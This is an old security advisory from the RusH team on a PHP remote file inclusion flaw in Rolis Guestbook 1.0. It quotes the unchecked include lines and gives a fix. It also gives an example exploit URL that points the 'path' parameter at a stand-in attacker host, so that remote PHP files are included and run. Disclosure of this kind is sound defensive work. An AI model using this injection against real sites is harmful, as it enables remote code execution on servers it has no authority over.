|
############ ###################### #################### ################### ######################## ######################### ###################### ##### #### #### ################## #### #### #### ##### ###### ## ##### ### ###### ######## ################# ################ ###### ### ####### ### ######## ################ ############## ###### ### ## ############### #### ######## ####### ### ##### ######## ################## #### ######## ####### ### ####### ###### ################## #### ###### ####### ### ########## #### #### ########### #### ##### ######## ### ##### ###### #### ####### ####### ############# ######## ########## ###################### ########## ####### ######## ################# ###### ##### RusH security team | http://www.rsteam.ru o----------------------------=[ Advisory #13 ]=----------------------------o oxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxo o--------------------------------------------------------------------------o | Product: Rolis Guestbook | | Version: 1.0 | | Vulnerability: PHP injection | | Vendor: Koch Roland (roli.ko@gmx.at) | | OffSite: www.roli.at | | Vendor status: The vendor has been informed | o--------------------------------------------------------------------------o | Date: 16/11/2003 | | Author: 1dt.w0lf // RsT | o--------------------------------------------------------------------------o o-------------------------=[ Problem ]::: Bug found in file insert.inc.php Script don't check $path before including files: <?php include ($path . "data.inc.php"); include ($path . "header.inc.php"); include($path . "connection_data.inc.php"); [ scip ] o-------------------------=[ Example ]::: Example: www.site.com/rolis_book_path/insert.inc.php?path=http://hacker.com/ where hackers files: http://hacker.com/data.inc.php http://hacker.com/header.inc.php http://hacker.com/connection_data.inc.php o------------------------=[ Solution ]::: Edit insert.inc.php: <?php include ("path.inc.php"); <-- insert this line include ($path . "data.inc.php"); ... o--------------------=[ for contacts ]::: 1dt.w0lf - idtwolf[at]pisem[dot]net RusH team - r00t[at]rsteam[dot]ru web - www.rsteam.ru o------------------------------=[ RU ]::: U can find ru version of this advisory here: http://rst.void.ru/texts/advisory13.htm o---------------------------------=[ EOF ]=--------------------------------o